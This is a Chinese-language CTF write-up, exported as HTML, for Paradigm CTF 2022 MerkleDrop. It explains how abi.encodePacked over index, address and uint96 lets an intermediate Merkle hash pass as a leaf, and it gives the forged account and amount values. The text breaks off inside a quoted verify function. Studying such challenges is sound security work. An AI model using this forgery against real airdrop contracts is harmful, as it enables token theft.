<!DOCTYPE html><html><head>
      <title>ParadigmCTF_2022_MarkleDrop</title>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      
      <link rel="stylesheet" href="file:///c:\Users\&#x5C0F;&#x6829;\.vscode\extensions\shd101wyy.markdown-preview-enhanced-0.6.5\node_modules\@shd101wyy\mume\dependencies\katex\katex.min.css">
      
      
      
      
      
      
      
      
      
      <style>
      /**
 * prism.js Github theme based on GitHub's theme.
 * @author Sam Clarke
 */
code[class*="language-"],
pre[class*="language-"] {
  color: #333;
  background: none;
  font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;
  text-align: left;
  white-space: pre;
  word-spacing: normal;
  word-break: normal;
  word-wrap: normal;
  line-height: 1.4;

  -moz-tab-size: 8;
  -o-tab-size: 8;
  tab-size: 8;

  -webkit-hyphens: none;
  -moz-hyphens: none;
  -ms-hyphens: none;
  hyphens: none;
}

/* Code blocks */
pre[class*="language-"] {
  padding: .8em;
  overflow: auto;
  /* border: 1px solid #ddd; */
  border-radius: 3px;
  /* background: #fff; */
  background: #f5f5f5;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
  padding: .1em;
  border-radius: .3em;
  white-space: normal;
  background: #f5f5f5;
}

.token.comment,
.token.blockquote {
  color: #969896;
}

.token.cdata {
  color: #183691;
}

.token.doctype,
.token.punctuation,
.token.variable,
.token.macro.property {
  color: #333;
}

.token.operator,
.token.important,
.token.keyword,
.token.rule,
.token.builtin {
  color: #a71d5d;
}

.token.string,
.token.url,
.token.regex,
.token.attr-value {
  color: #183691;
}

.token.property,
.token.number,
.token.boolean,
.token.entity,
.token.atrule,
.token.constant,
.token.symbol,
.token.command,
.token.code {
  color: #0086b3;
}

.token.tag,
.token.selector,
.token.prolog {
  color: #63a35c;
}

.token.function,
.token.namespace,
.token.pseudo-element,
.token.class,
.token.class-name,
.token.pseudo-class,
.token.id,
.token.url-reference .token.variable,
.token.attr-name {
  color: #795da3;
}

.token.entity {
  cursor: help;
}

.token.title,
.token.title .token.punctuation {
  font-weight: bold;
  color: #1d3e81;
}

.token.list {
  color: #ed6a43;
}

.token.inserted {
  background-color: #eaffea;
  color: #55a532;
}

.token.deleted {
  background-color: #ffecec;
  color: #bd2c00;
}

.token.bold {
  font-weight: bold;
}

.token.italic {
  font-style: italic;
}


/* JSON */
.language-json .token.property {
  color: #183691;
}

.language-markup .token.tag .token.punctuation {
  color: #333;
}

/* CSS */
code.language-css,
.language-css .token.function {
  color: #0086b3;
}

/* YAML */
.language-yaml .token.atrule {
  color: #63a35c;
}

code.language-yaml {
  color: #183691;
}

/* Ruby */
.language-ruby .token.function {
  color: #333;
}

/* Markdown */
.language-markdown .token.url {
  color: #795da3;
}

/* Makefile */
.language-makefile .token.symbol {
  color: #795da3;
}

.language-makefile .token.variable {
  color: #183691;
}

.language-makefile .token.builtin {
  color: #0086b3;
}

/* Bash */
.language-bash .token.keyword {
  color: #0086b3;
}

/* highlight */
pre[data-line] {
  position: relative;
  padding: 1em 0 1em 3em;
}
pre[data-line] .line-highlight-wrapper {
  position: absolute;
  top: 0;
  left: 0;
  background-color: transparent;
  display: block;
  width: 100%;
}

pre[data-line] .line-highlight {
  position: absolute;
  left: 0;
  right: 0;
  padding: inherit 0;
  margin-top: 1em;
  background: hsla(24, 20%, 50%,.08);
  background: linear-gradient(to right, hsla(24, 20%, 50%,.1) 70%, hsla(24, 20%, 50%,0));
  pointer-events: none;
  line-height: inherit;
  white-space: pre;
}

pre[data-line] .line-highlight:before, 
pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-start);
  position: absolute;
  top: .4em;
  left: .6em;
  min-width: 1em;
  padding: 0 .5em;
  background-color: hsla(24, 20%, 50%,.4);
  color: hsl(24, 20%, 95%);
  font: bold 65%/1.5 sans-serif;
  text-align: center;
  vertical-align: .3em;
  border-radius: 999px;
  text-shadow: none;
  box-shadow: 0 1px white;
}

pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-end);
  top: auto;
  bottom: .4em;
}html body{font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,freesans,sans-serif;font-size:16px;line-height:1.6;color:#333;background-color:#fff;overflow:initial;box-sizing:border-box;word-wrap:break-word}html body>:first-child{margin-top:0}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{line-height:1.2;margin-top:1em;margin-bottom:16px;color:#000}html body h1{font-size:2.25em;font-weight:300;padding-bottom:.3em}html body h2{font-size:1.75em;font-weight:400;padding-bottom:.3em}html body h3{font-size:1.5em;font-weight:500}html body h4{font-size:1.25em;font-weight:600}html body h5{font-size:1.1em;font-weight:600}html body h6{font-size:1em;font-weight:600}html body h1,html body h2,html body h3,html body h4,html body h5{font-weight:600}html body h5{font-size:1em}html body h6{color:#5c5c5c}html body strong{color:#000}html body del{color:#5c5c5c}html body a:not([href]){color:inherit;text-decoration:none}html body a{color:#08c;text-decoration:none}html body a:hover{color:#00a3f5;text-decoration:none}html body img{max-width:100%}html body>p{margin-top:0;margin-bottom:16px;word-wrap:break-word}html body>ul,html body>ol{margin-bottom:16px}html body ul,html body ol{padding-left:2em}html body ul.no-list,html body ol.no-list{padding:0;list-style-type:none}html body ul ul,html body ul ol,html body ol ol,html body ol ul{margin-top:0;margin-bottom:0}html body li{margin-bottom:0}html body li.task-list-item{list-style:none}html body li>p{margin-top:0;margin-bottom:0}html body .task-list-item-checkbox{margin:0 .2em .25em -1.8em;vertical-align:middle}html body .task-list-item-checkbox:hover{cursor:pointer}html body blockquote{margin:16px 0;font-size:inherit;padding:0 15px;color:#5c5c5c;background-color:#f0f0f0;border-left:4px solid #d6d6d6}html body blockquote>:first-child{margin-top:0}html body blockquote>:last-child{margin-bottom:0}html body hr{height:4px;margin:32px 0;background-color:#d6d6d6;border:0 none}html body table{margin:10px 0 15px 0;border-collapse:collapse;border-spacing:0;display:block;width:100%;overflow:auto;word-break:normal;word-break:keep-all}html body table th{font-weight:bold;color:#000}html body table td,html body table th{border:1px solid #d6d6d6;padding:6px 13px}html body dl{padding:0}html body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:bold}html body dl dd{padding:0 16px;margin-bottom:16px}html body code{font-family:Menlo,Monaco,Consolas,'Courier New',monospace;font-size:.85em !important;color:#000;background-color:#f0f0f0;border-radius:3px;padding:.2em 0}html body code::before,html body code::after{letter-spacing:-0.2em;content:"\00a0"}html body pre>code{padding:0;margin:0;font-size:.85em !important;word-break:normal;white-space:pre;background:transparent;border:0}html body .highlight{margin-bottom:16px}html body .highlight pre,html body pre{padding:1em;overflow:auto;font-size:.85em !important;line-height:1.45;border:#d6d6d6;border-radius:3px}html body .highlight pre{margin-bottom:0;word-break:normal}html body pre code,html body pre tt{display:inline;max-width:initial;padding:0;margin:0;overflow:initial;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}html body pre code:before,html body pre tt:before,html body pre code:after,html body pre tt:after{content:normal}html body p,html body blockquote,html body ul,html body ol,html body dl,html body pre{margin-top:0;margin-bottom:16px}html body kbd{color:#000;border:1px solid #d6d6d6;border-bottom:2px solid #c7c7c7;padding:2px 4px;background-color:#f0f0f0;border-radius:3px}@media print{html body{background-color:#fff}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{color:#000;page-break-after:avoid}html body blockquote{color:#5c5c5c}html body pre{page-break-inside:avoid}html body table{display:table}html body img{display:block;max-width:100%;max-height:100%}html body pre,html body code{word-wrap:break-word;white-space:pre}}.markdown-preview{width:100%;height:100%;box-sizing:border-box}.markdown-preview .pagebreak,.markdown-preview .newpage{page-break-before:always}.markdown-preview pre.line-numbers{position:relative;padding-left:3.8em;counter-reset:linenumber}.markdown-preview pre.line-numbers>code{position:relative}.markdown-preview pre.line-numbers .line-numbers-rows{position:absolute;pointer-events:none;top:1em;font-size:100%;left:0;width:3em;letter-spacing:-1px;border-right:1px solid #999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.markdown-preview pre.line-numbers .line-numbers-rows>span{pointer-events:none;display:block;counter-increment:linenumber}.markdown-preview pre.line-numbers .line-numbers-rows>span:before{content:counter(linenumber);color:#999;display:block;padding-right:.8em;text-align:right}.markdown-preview .mathjax-exps .MathJax_Display{text-align:center !important}.markdown-preview:not([for="preview"]) .code-chunk .btn-group{display:none}.markdown-preview:not([for="preview"]) .code-chunk .status{display:none}.markdown-preview:not([for="preview"]) .code-chunk .output-div{margin-bottom:16px}.scrollbar-style::-webkit-scrollbar{width:8px}.scrollbar-style::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}.scrollbar-style::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode]){position:relative;width:100%;height:100%;top:0;left:0;margin:0;padding:0;overflow:auto}html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{position:relative;top:0}@media screen and (min-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em calc(50% - 457px + 2em)}}@media screen and (max-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{font-size:14px !important;padding:1em}}@media print{html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{display:none}}html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{position:fixed;bottom:8px;left:8px;font-size:28px;cursor:pointer;color:inherit;z-index:99;width:32px;text-align:center;opacity:.4}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] #sidebar-toc-btn{opacity:1}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc{position:fixed;top:0;left:0;width:300px;height:100%;padding:32px 0 48px 0;font-size:14px;box-shadow:0 0 4px rgba(150,150,150,0.33);box-sizing:border-box;overflow:auto;background-color:inherit}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar{width:8px}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc a{text-decoration:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{padding:0 1.6em;margin-top:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc li{margin-bottom:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{list-style-type:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{left:300px;width:calc(100% -  300px);padding:2em calc(50% - 457px -  150px);margin:0;box-sizing:border-box}@media screen and (max-width:1274px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{width:100%}}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .markdown-preview{left:50%;transform:translateX(-50%)}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .md-sidebar-toc{display:none}
/* Please visit the URL below for more information: */
/*   https://shd101wyy.github.io/markdown-preview-enhanced/#/customize-css */

      </style>
    </head>
    <body for="html-export">
      <div class="mume markdown-preview  ">
      <h1 class="mume-header" id="paradigm-2022-ctf-%E9%A2%98%E8%A7%A3merkledrop">paradigm 2022 ctf &#x9898;&#x89E3;&#x2014;&#x2014;MerkleDrop</h1>

<hr>
<pre class="language-text">author&#xFF1A;Thomas_Xu
</pre>
<p><strong>&#x73AF;&#x5883;&#x914D;&#x7F6E;</strong>:<br>
&#x7531;&#x4E8E;&#x9898;&#x76EE;&#x73AF;&#x5883;&#x9700;&#x8981;&#x4F7F;&#x7528;docker&#xFF0C;&#x73AF;&#x5883;&#x914D;&#x7F6E;&#x6709;&#x70B9;&#x7E41;&#x7410;&#x3002;&#x6211;&#x91CD;&#x65B0;&#x642D;&#x4E86;&#x4E00;&#x4E2A;hardhat&#x6846;&#x67B6;&#x7684;&#x6D4B;&#x8BD5;&#x73AF;&#x5883;,&#x800C;&#x7531;&#x4E8E;&#x9898;&#x76EE;&#x51FA;&#x5728;&#x4EE5;&#x592A;&#x574A;&#x7684;&#x4E3B;&#x94FE;&#x4E0A;,&#x5E76;&#x4F7F;&#x7528;<code>Alchemy</code>fork&#x4E86;&#x4E00;&#x4E2A;&#x4E3B;&#x7F51;&#x8282;&#x70B9;&#x8FDB;&#x884C;&#x6D4B;&#x8BD5;</p>
<h2 class="mume-header" id="%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90">&#x9898;&#x76EE;&#x5206;&#x6790;</h2>

<p>&#x9996;&#x5148;&#x5148;&#x6765;&#x770B;&#x4E00;&#x4E0B;&#x8FD9;&#x9053;&#x9898;&#x76EE;&#x7684;&#x63CF;&#x8FF0;<code>Were you whitelisted?</code>&#x4F60;&#x662F;&#x5426;&#x5728;&#x767D;&#x540D;&#x5355;&#x91CC;&#xFF1F;&#x663E;&#x800C;&#x6613;&#x89C1;&#xFF0C;&#x8FD9;&#x662F;&#x4E00;&#x9053;&#x5173;&#x4E8E;&#x7A7A;&#x5934;&#x767D;&#x540D;&#x5355;&#x7684;&#x95EE;&#x9898;&#x3002;&#x800C;&#x9898;&#x76EE;&#x7ED9;&#x6211;&#x4EEC;&#x63D0;&#x4F9B;&#x4E86;64&#x4E2A;&#x53F6;&#x5B50;&#x8282;&#x70B9;&#x7684;&#x9A8C;&#x8BC1;&#x4FE1;&#x606F;&#xFF0C;&#x5176;&#x4E2D;&#x5305;&#x62EC;&#x6BCF;&#x4E2A;&#x7528;&#x6237;&#x5730;&#x5740;&#x5BF9;&#x5E94;&#x7684; <code>index</code>&#xFF0C;<code>amount</code> &#x4EE5;&#x53CA; <code>proof</code> &#x9A8C;&#x8BC1;hash&#x3002;&#x7528;&#x6237;&#x53EF;&#x4EE5;&#x51ED;&#x6B64;&#x6587;&#x4EF6;&#x4E2D;&#x7684;&#x76F8;&#x5173; Proofs &#x5230;&#x5408;&#x7EA6;&#x4E2D; Claim &#x76F8;&#x5E94;&#x6570;&#x91CF;&#x7684; Token&#x3002;&#x4F3C;&#x4E4E;&#x6211;&#x4EEC;&#x8981;&#x901A;&#x8FC7;&#x67D0;&#x79CD;&#x6F0F;&#x6D1E;&#x6765;&#x83B7;&#x53D6;&#x767D;&#x540D;&#x5355;&#x6743;&#x9650;&#xFF0C;&#x6211;&#x4EEC;&#x8FDB;&#x5165;&#x5230;<code>Setup</code>&#x4E2D;&#x53BB;&#x770B;&#x5224;&#x65AD;&#x6761;&#x4EF6;&#xFF1A;</p>
<pre data-role="codeBlock" data-info="solidity" class="language-solidity"><span class="token keyword keyword-function">function</span> <span class="token function">isSolved</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword keyword-public">public</span> <span class="token keyword keyword-view">view</span> <span class="token keyword keyword-returns">returns</span> <span class="token punctuation">(</span><span class="token builtin">bool</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token builtin">bool</span> condition1 <span class="token operator">=</span> token<span class="token punctuation">.</span><span class="token function">balanceOf</span><span class="token punctuation">(</span><span class="token builtin">address</span><span class="token punctuation">(</span>merkleDistributor<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">;</span>
        <span class="token builtin">bool</span> condition2 <span class="token operator">=</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
        <span class="token keyword keyword-for">for</span> <span class="token punctuation">(</span><span class="token builtin">uint256</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator">&lt;</span> <span class="token number">64</span><span class="token punctuation">;</span> <span class="token operator">++</span>i<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token keyword keyword-if">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>merkleDistributor<span class="token punctuation">.</span><span class="token function">isClaimed</span><span class="token punctuation">(</span>i<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                condition2 <span class="token operator">=</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
                <span class="token keyword keyword-break">break</span><span class="token punctuation">;</span>
            <span class="token punctuation">}</span>
        <span class="token punctuation">}</span>
        <span class="token keyword keyword-return">return</span> condition1 <span class="token operator">&amp;&amp;</span> condition2<span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
</pre><p>&#x6709;&#x4E24;&#x4E2A;&#x5224;&#x9898;&#xFF1A;</p>
<ul>
<li>&#x8981;&#x6C42;&#x9886;&#x5B8C;&#x7A7A;&#x6295;&#x94B1;&#x5305;&#x7684;&#x4F59;&#x989D;</li>
<li>&#x8981;&#x6C42;&#x767D;&#x540D;&#x5355;&#x91CC;&#x81F3;&#x5C11;&#x6709;1&#x4E2A;&#x4EBA;&#x6CA1;&#x6709;&#x9886;&#x7A7A;&#x6295;</li>
</ul>
<p>&#x7B97;&#x4E86;&#x4E00;&#x4E0B;&#xFF0C;json&#x6587;&#x4EF6;&#x4E2D;64&#x4E2A;&#x5730;&#x5740;&#x80FD;&#x9886;&#x7684;&#x91D1;&#x989D;&#x76F8;&#x52A0;&#x521A;&#x597D;&#x7B49;&#x4E8E;<code>merkleDistributor</code>&#x4E2D;&#x7684;&#x4F59;&#x989D; 75 ETH&#xFF0C;&#x60F3;&#x8981;&#x540C;&#x65F6;&#x5B8C;&#x6210;&#x8FD9;&#x4E24;&#x4E2A;&#x5224;&#x9898;&#x8C8C;&#x4F3C;&#x662F;&#x4E0D;&#x53EF;&#x80FD;&#x7684;&#x4E8B;&#x3002;</p>
<p>&#x5982;&#x679C;&#x662F;&#x6309;&#x7167;&#x6807;&#x51C6;&#x5B9E;&#x73B0;&#x7684;Merkle Tree&#x6211;&#x4EEC;&#x51E0;&#x4E4E;&#x4E0D;&#x53EF;&#x80FD;&#x5BF9;&#x5176;&#x8FDB;&#x884C;&#x653B;&#x51FB;&#x3002;&#x90A3;&#x4E48;&#x8BA9;&#x6211;&#x4EEC;&#x6765;&#x5BF9;&#x6BD4;&#x4E00;&#x4E0B;&#x8FD9;&#x91CC;&#x7684;&#x4EE3;&#x7801;&#x548C;&#x6807;&#x51C6;&#x5B9E;&#x73B0;&#x7684;Merkle Tree&#x6709;&#x4EC0;&#x4E48;&#x4E0D;&#x540C;&#x5427;&#x3002;<br>
<img src="../images/ParadigmCTF/2022/merkledrop_01.jpg" alt></p>
<p>&#x8FD9;&#x4E2A;<code>uint96</code>&#x662F;&#x6700;&#x53EF;&#x7591;&#x7684;&#x5730;&#x65B9;</p>
<p>&#x8BA9;&#x6211;&#x4EEC;&#x56DE;&#x987E;&#x4E00;&#x4E0B;MerkleTree&#x7684;&#x9A8C;&#x8BC1;&#x8FC7;&#x7A0B;</p>
<p><img src="C:%5CUsers%5C%E5%B0%8F%E6%A0%A9%5CDocuments%5CGitHub%5CConract_Attack%5Cimages%5CParadigmCTF%5C2022%5CMerkleHash.png" alt></p>
<p>Merkle Tree &#x7684;&#x57FA;&#x672C;&#x539F;&#x7406;&#x662F;&#x4F9D;&#x9760;&#x53F6;&#x5B50;&#x8282;&#x70B9;&#x7684;&#x503C;&#x4E00;&#x5C42;&#x5C42;&#x8BA1;&#x7B97;&#x51FA; hash&#xFF0C;&#x6700;&#x7EC8;&#x5F97;&#x5230; Root &#x503C;&#xFF0C;&#x9A8C;&#x8BC1;&#x67D0;&#x4E00;&#x4E2A;&#x53F6;&#x5B50;&#x8282;&#x70B9;&#x662F;&#x5426;&#x5728; Merkle Tree &#x4E2D;&#xFF0C;&#x53EA;&#x9700;&#x63D0;&#x4F9B;&#x76F8;&#x5BF9;&#x5E94;&#x7684; Proofs &#x8DEF;&#x5F84;&#x8FDB;&#x884C;&#x8BA1;&#x7B97;&#xFF0C;&#x89C2;&#x5BDF;&#x6700;&#x7EC8;&#x7684; Root &#x503C;&#x662F;&#x5426;&#x4E00;&#x81F4;&#x5373;&#x53EF;&#x3002;</p>
<p>&#x800C;&#x8FD9;&#x4E2A;&#x9898;&#x6700;&#x5DE7;&#x5999;&#x7684;&#x4E00;&#x70B9;&#x5C31;&#x662F;&#xFF1A;&#x7531;&#x4E8E;<code>amout</code>&#x5B57;&#x6BB5;&#x4F7F;&#x7528;&#x4E86;uint96&#xFF0C;&#x5BFC;&#x81F4;&#x51FA;&#x73B0;&#x4E86;&#x4E00;&#x4E2A;&#x5DE7;&#x5408;&#x3002;</p>
<pre data-role="codeBlock" data-info="solidity" class="language-solidity"><span class="token keyword keyword-function">function</span> <span class="token function">claim</span><span class="token punctuation">(</span><span class="token builtin">uint256</span> index<span class="token punctuation">,</span> <span class="token builtin">address</span> account<span class="token punctuation">,</span> <span class="token builtin">uint96</span> amount<span class="token punctuation">,</span> <span class="token builtin">bytes32</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token keyword keyword-memory">memory</span> merkleProof<span class="token punctuation">)</span> <span class="token keyword keyword-external">external</span> <span class="token punctuation">{</span>
        <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>

        <span class="token comment">// Verify the merkle proof.</span>
        <span class="token builtin">bytes32</span> node <span class="token operator">=</span> <span class="token function">keccak256</span><span class="token punctuation">(</span>abi<span class="token punctuation">.</span><span class="token function">encodePacked</span><span class="token punctuation">(</span>index<span class="token punctuation">,</span> account<span class="token punctuation">,</span> amount<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword keyword-require">require</span><span class="token punctuation">(</span>MerkleProof<span class="token punctuation">.</span><span class="token function">verify</span><span class="token punctuation">(</span>merkleProof<span class="token punctuation">,</span> merkleRoot<span class="token punctuation">,</span> node<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">&apos;MerkleDistributor: Invalid proof.&apos;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

      	<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</pre><p>claim&#x91CC;&#x7684;node&#x8282;&#x70B9;hash&#x8BA1;&#x7B97;&#x65B9;&#x5F0F;&#x662F;&#x5148;<code>abi.encodePacked(index, account, amount)</code>&#x518D;hash&#x3002;&#x800C;&#x8FD9;&#x91CC;&#x7684;&#x4E09;&#x4E2A;&#x5B57;&#x6BB5;&#x4E3A;</p>
<ul>
<li>index[uint256]: 32bytes</li>
<li>account[address]:20bytes</li>
<li>amount[uint96]:12bytes</li>
</ul>
<p>&#x8FD9;&#x4E09;&#x4E2A;&#x5B57;&#x6BB5;&#x52A0;&#x8D77;&#x6765;&#x521A;&#x597D;&#x662F;64bytes&#x3002;&#x6B63;&#x597D;&#x662F;&#x4E24;&#x4E2A; keccak256 hash &#x7ED3;&#x679C;&#x62FC;&#x63A5;&#x5728;&#x4E00;&#x8D77;&#x7684;&#x5927;&#x5C0F;&#x3002;&#x53EF;&#x4EE5;&#x770B;&#x6210;&#x662F;&#x5176;&#x4E2D;&#x4E00;&#x4E2A; hash &#x503C;&#x4F5C;&#x4E3A; index, &#x53E6;&#x4E00;&#x4E2A; hash &#x503C;&#x4F5C;&#x4E3A; account + amount&#x3002;</p>
<p>&#x90A3;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x5229;&#x7528;&#x6B64;&#x5DE7;&#x5408;&#x53BB;&#x6784;&#x9020;&#x4E00;&#x4E2A;&#x5047;&#x7684;&#x8F93;&#x5165;&#xFF0C;&#x800C;&#x8FD9;&#x4E2A;&#x8F93;&#x5165;&#x53EF;&#x4EE5;&#x5B8C;&#x7F8E;&#x901A;&#x8FC7;hash&#x9A8C;&#x8BC1;&#x3002;</p>
<h2 class="mume-header" id="exploit">Exploit</h2>

<p>&#x73B0;&#x5728;&#x7684;&#x91CD;&#x70B9;&#x5C31;&#x662F;&#x53BB;&#x6784;&#x9020;&#x8FD9;&#x4E2A;&#x201D;&#x5DE7;&#x5408;&#x7684;&#x54C8;&#x5E0C;&#x201C;</p>
<p>&#x7A7A;&#x6295;&#x7684;&#x603B;&#x6570;&#x91CF;&#x4E3A;7500&#x4E2A;ETH&#xFF0C;&#x5373;0x0fe1c215e8f838e00000&#xFF0C;&#x800C;uint96&#x7684;&#x6700;&#x5927;&#x503C;&#x4E3A;0xffffffffffffffffffffffff&#xFF0C;&#x5F88;&#x660E;&#x663E;&#xFF0C;&#x5982;&#x679C;&#x662F;&#x968F;&#x673A;&#x7684;&#x54C8;&#x5E0C;&#x7ED3;&#x679C;&#xFF0C;&#x662F;&#x4F1A;&#x8FDC;&#x8FDC;&#x5927;&#x4E8E;&#x7A7A;&#x6295;&#x7684;&#x603B;&#x6570;&#x91CF;&#x3002;</p>
<pre data-role="codeBlock" data-info class="language-"><code>0xffffffffffffffffffffffff
0x00000fe1c215e8f838e00000
</code></pre><p>&#x4E8C;&#x8005;&#x81F3;&#x5C11;&#x5DEE;&#x4E86;5&#x4E2A;0&#xFF0C;&#x4E0D;&#x8FC7;&#x8FD9;&#x4E5F;&#x7ED9;&#x6211;&#x4EEC;&#x63D0;&#x4F9B;&#x4E86;&#x4E00;&#x4E2A;&#x601D;&#x8DEF;&#xFF0C;&#x6211;&#x4EEC;&#x53BB;tree.json&#x641C;&#x4E00;&#x4E0B;&#x6709;5&#x4E2A;&#x8FDE;&#x7EED;0&#x7684;&#x54C8;&#x5E0C;&#x3002;</p>
<p><img src="C:%5CUsers%5C%E5%B0%8F%E6%A0%A9%5CDocuments%5CGitHub%5CConract_Attack%5Cimages%5CParadigmCTF%5C2022%5Cmarklejson_serch.png" alt></p>
<p>&#x5F88;&#x5BB9;&#x6613;&#x53D1;&#x73B0;37&#x8FD9;&#x4E2A;&#x8282;&#x70B9;</p>
<p>&#x66F4;&#x5DE7;&#x5408;&#x7684;&#x662F;&#x4ECE;&#x7B2C;&#x4E00;&#x4E2A;0&#x5904;&#x628A;&#x8FD9;&#x4E2A;&#x54C8;&#x5E0C;&#x622A;&#x65AD;&#x7684;&#x8BDD;&#xFF0C;&#x524D;&#x4E00;&#x90E8;&#x5206;&#x521A;&#x597D;&#x662F;20bytes,&#x540E;&#x4E00;&#x90E8;&#x5206;&#x521A;&#x597D;&#x662F;12bytes&#x3002;&#x6362;&#x53E5;&#x8BDD;&#x8BF4;&#xFF0C;&#x8FD9;&#x4E2A;&#x54C8;&#x5E0C;&#x53EF;&#x4EE5;&#x88AB;&#x89E3;&#x6790;&#x4E3A;<code>account + amount</code>&#x3002;</p>
<pre data-role="codeBlock" data-info class="language-"><code>account: 0xd48451c19959e2D9bD4E620fBE88aA5F6F7eA72A
amount: 0x00000f40f0c122ae08d2207b
</code></pre><p>&#x6765;&#x770B;&#x770B;<code>MerkleProof</code>&#x91CC;&#x662F;&#x600E;&#x4E48;&#x9A8C;&#x8BC1;&#x8282;&#x70B9;&#x7684;&#xFF1A;</p>
<pre data-role="codeBlock" data-info="solidity" class="language-solidity"><span class="token keyword keyword-function">function</span> <span class="token function">verify</span><span class="token punctuation">(</span>
    <span class="token builtin">bytes32</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token keyword keyword-memory">memory</span> proof<span class="token punctuation">,</span>
    <span class="token builtin">bytes32</span> root<span class="token punctuation">,</span>
    <span class="token builtin">bytes32</span> leaf
  <span class="token punctuation">)</span>
    <span class="token keyword keyword-internal">internal</span>
    <span class="token keyword keyword-pure">pure</span>
    <span class="token keyword keyword-returns">returns</span> <span class="token punctuation">(</span><span class="token builtin">bool</span><span class="token punctuation">)</span>
  <span class="token punctuation">{</span>
    <span class="token builtin">bytes32</span> computedHash <span class="token operator">=</span> leaf<span class="token punctuation">;</span>

    <span class="token keyword keyword-for">for</span> <span class="token punctuation">(</span><span class="token builtin">uint256</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator">&lt;</span> proof<span class="token punctuation">.</span>length<span class="token punctuation">;</span> i<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      <span class="token builtin">bytes32</span> proofElement <span class="token operator">=</span> proof<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">;</span>

      <span class="token keyword keyword-if">if</span> <span class="token punctuation">(</span>computedHash <span class="token operator">&lt;</span> proofElement<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token comment">// Hash(current computed hash + current element of the proof)</span>
        computedHash <span class="token operator">=</span> <span class="token function">keccak256</span><span class="token punctuation">(</span>abi<span class="token punctuation">.</span><span class="token function">encodePacked</span><span class="token punctuation">(</span>computedHash<span class="token punctuation">,</span> proofElement<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span> <span class="token keyword keyword-else">else</span> <span class="token punctuation">{</span>
        <span class="token comment">// Hash(current element of the proof + current computed hash)</span>
        computedHash <span class="token operator">=</span> <span class="token function">keccak256</span><span class="token punctuation">(</span>abi<span class="token punctuation">.</span><span class="token function">encodePacked</span><span class="token punctuation">(</span>proofElement<span class="token punctuation">,</span> computedHash<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
